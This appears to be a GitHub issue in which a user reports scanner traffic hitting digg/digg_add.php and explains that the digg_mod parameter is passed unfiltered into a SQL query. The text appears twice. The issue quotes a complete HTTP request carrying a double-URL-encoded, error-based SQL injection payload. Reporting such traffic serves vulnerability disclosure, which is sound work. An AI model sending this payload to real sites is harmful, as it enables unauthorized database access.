You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
today , i collect some traffic from internet and i found something like this.
GET //digg/digg_add.php?id=1&con=2&digg_mod=digg_data%2520WHERE%25201=2%2520+and(select%25201%2520from(select%2520count(*)%2cconcat((select%2520(select%2520(select%2520concat(0x7e%2cmd5(1234)%2c0x7e)))%2520from%2520information_schema.tables%2520limit%25200%2c1)%2cfloor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a)%2523 HTTP/1.1%0d%0aHost: 47.244.39.15%0d%0aConnection: keep-alive%0d%0aAccept: */*%0d%0aAccept-Encoding: gzip%2c deflate%0d%0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML%2c like Gecko) Version/5.1 Safari/534.50%0d%0a%0d%0a
so many scanner try to do some thiing . so i do some reserach ..
it's easy...there is no filter in digg_add.php . the digg_mod trans to mod_id and get excute.
The text was updated successfully, but these errors were encountered:
today , i collect some traffic from internet and i found something like this.
GET //digg/digg_add.php?id=1&con=2&digg_mod=digg_data%2520WHERE%25201=2%2520+and(select%25201%2520from(select%2520count(*)%2cconcat((select%2520(select%2520(select%2520concat(0x7e%2cmd5(1234)%2c0x7e)))%2520from%2520information_schema.tables%2520limit%25200%2c1)%2cfloor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a)%2523 HTTP/1.1%0d%0aHost: 47.244.39.15%0d%0aConnection: keep-alive%0d%0aAccept: */*%0d%0aAccept-Encoding: gzip%2c deflate%0d%0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML%2c like Gecko) Version/5.1 Safari/534.50%0d%0a%0d%0aso many scanner try to do some thiing . so i do some reserach ..
it's easy...there is no filter in digg_add.php . the digg_mod trans to mod_id and get excute.
The text was updated successfully, but these errors were encountered: